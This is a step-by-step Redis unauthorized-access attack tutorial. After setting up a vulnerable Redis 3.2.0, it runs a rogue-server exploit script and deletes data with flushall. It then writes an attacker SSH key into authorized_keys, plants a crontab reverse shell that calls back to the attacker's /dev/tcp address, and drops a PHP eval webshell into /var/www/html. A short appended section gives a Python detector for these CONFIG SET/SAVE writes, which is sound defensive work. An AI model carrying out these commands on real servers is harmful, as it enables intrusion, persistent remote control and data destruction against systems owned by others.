Redis (6379) unauthorized access
Environment setup
Open a Kali terminal and enter the following commands:
wget http://download.redis.io/releases/redis-3.2.0.tar.gz
tar xzf redis-3.2.0.tar.gz
cd redis-3.2.0
make
cd src
cp redis-server /usr/bin
cp redis-cli /usr/bin
This copies redis-server and redis-cli into the /usr/bin directory.
cd ..
Go back to the redis-3.2.0 directory and copy redis.conf into /etc/:
cp redis.conf /etc
Start the Redis service using the configuration in /etc/redis.conf.
Enter the src directory again:
redis-server /etc/redis.conf
Edit the Redis configuration file redis.conf under /etc:
vim /etc/redis.conf
![](https://upload-images.jianshu.io/upload_images/4664072-11b38c73bb45ade3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-bcdbacf8dabe715f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Open a second Kali terminal and return to the src directory:
cd redis-3.2.0
ls
cd src
./redis-cli -h (IP address)
get dir, or info
I. Script-based testing
https://github.com/vulhub/redis-rogue-getshell
cd RedisModulesSDK/
make
cd ../
python3 redis-master.py -r 192.168.49.2 -p 6379 -L 192.168.49.5 -P 4441 -f RedisModulesSDK/exp.so -c "id"
II. Manual testing
1. Remote connection
![](https://upload-images.jianshu.io/upload_images/4664072-5b9157708252cbb5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
View the keys inside and their corresponding values.
2. Deleting Redis data
flushall: delete all data
del key: delete the data stored under the key named key
![](https://upload-images.jianshu.io/upload_images/4664072-1820828cc1411c5a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
3. Logging in to the Redis server via SSH key
Generate a public/private key pair with ssh-keygen on the attacking machine, write the public key into the Redis server, and then log in with the private key.
ssh-keygen
cat /root/.ssh/id_rsa.pub
![](https://upload-images.jianshu.io/upload_images/4664072-aa7a60a9ef4fb297.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Enter the following commands:
cd /root/.ssh
ls
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt
![](https://upload-images.jianshu.io/upload_images/4664072-4d245ebdfac1e4c2.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
cat /root/.ssh/key.txt | ./redis-cli -h 192.168.244.128 -x set xxx
![](https://upload-images.jianshu.io/upload_images/4664072-f9ba9ff554d2c75c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
./redis-cli -h 192.168.244.128
config set dir /root/.ssh
config set dbfilename authorized_keys
keys *
save
![](https://upload-images.jianshu.io/upload_images/4664072-54d855b75a3be392.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Now connect remotely with SSH:
ssh 192.168.244.128
4. Writing a scheduled task into crontab for a reverse shell
First, start a listener on the attacking side:
nc -l 4444
Connect to Redis and write the scheduled task:
./redis-cli -h 192.168.244.128
set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.244.129/4444 0>&1\n\n"
config set dir /var/spool/cron
config set dbfilename root
save
![](https://upload-images.jianshu.io/upload_images/4664072-a915559cec19cd13.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
5. Writing a webshell file
./redis-cli -h 192.168.244.128
config set dir /var/www/html
set xxx "\n\n\n<?php @eval($_POST['c']);?>\n\n\n"
config set dbfilename webshell.php
save
![](https://upload-images.jianshu.io/upload_images/4664072-01edc98473437e05.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
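All three manual techniques above (steps 3 to 5) share one server-side pattern: a client issues CONFIG SET dir and CONFIG SET dbfilename to point the RDB dump at a sensitive location and then calls SAVE. The following detector is an added example for defenders, not part of the original post; it parses `redis-cli MONITOR` output (timestamp, database, client address, quoted arguments) and raises an alert per client when that sequence completes. The MONITOR lines below are constructed for the example, and the list of sensitive directories is an assumption you should adapt to your hosts.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample of `redis-cli MONITOR` output (clients, keys and paths are made up).
SAMPLE_MONITOR = """\
1700000000.10 [0 192.168.244.129:51234] "set" "xxx" "<attacker-controlled blob>"
1700000000.20 [0 192.168.244.129:51234] "config" "set" "dir" "/root/.ssh"
1700000000.30 [0 192.168.244.129:51234] "config" "set" "dbfilename" "authorized_keys"
1700000000.40 [0 192.168.244.129:51234] "save"
1700000001.10 [0 192.168.244.129:51300] "CONFIG" "SET" "dir" "/var/spool/cron"
1700000001.20 [0 192.168.244.129:51300] "CONFIG" "SET" "dbfilename" "root"
1700000001.30 [0 192.168.244.129:51300] "SAVE"
1700000002.20 [0 10.0.0.7:40000] "save"
"""

LINE_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<rest>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')  # quoted args, honouring backslash escapes
# Assumed list of directories where a dumped RDB file becomes code or credentials.
SENSITIVE_DIRS = ("/root/.ssh", "/home/", "/var/spool/cron", "/etc/cron", "/var/www")


def parse_monitor_line(line: str) -> Optional[Tuple[str, str, List[str]]]:
    """Split one MONITOR line into (timestamp, client addr, argv); None if it does not match."""
    m = LINE_RE.match(line.strip())
    return (m["ts"], m["client"], ARG_RE.findall(m["rest"])) if m else None


def is_sensitive_target(directory: Optional[str], name: Optional[str]) -> bool:
    """True when dir/dbfilename together name an SSH key file, a crontab or a web-root script."""
    if not directory or not name or not directory.rstrip("/").startswith(SENSITIVE_DIRS):
        return False
    return name == "authorized_keys" or "cron" in directory or name.endswith((".php", ".jsp"))


def detect_rdb_file_write(monitor_text: str) -> List[Dict[str, str]]:
    """Alert when a client retargets the RDB dump to a sensitive path and then persists it."""
    state: Dict[str, Dict[str, Optional[str]]] = {}  # per-client dir / dbfilename
    alerts = []
    for line in monitor_text.splitlines():
        parsed = parse_monitor_line(line)
        if not parsed or not parsed[2]:
            continue
        ts, client, argv = parsed
        cmd = argv[0].lower()  # Redis commands are case-insensitive
        st = state.setdefault(client, {"dir": None, "dbfilename": None})
        if cmd == "config" and len(argv) >= 4 and argv[1].lower() == "set":
            if argv[2].lower() in st:
                st[argv[2].lower()] = argv[3]
        elif cmd in ("save", "bgsave") and is_sensitive_target(st["dir"], st["dbfilename"]):
            path = st["dir"].rstrip("/") + "/" + st["dbfilename"]
            alerts.append({"ts": ts, "client": client, "path": path})
    return alerts
```

Running it on the sample yields two alerts (the authorized_keys write and the crontab write) and none for the benign client that only calls SAVE with the default dump location.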
Script-based detection
https://github.com/n0b0dyCN/redis-rogue-server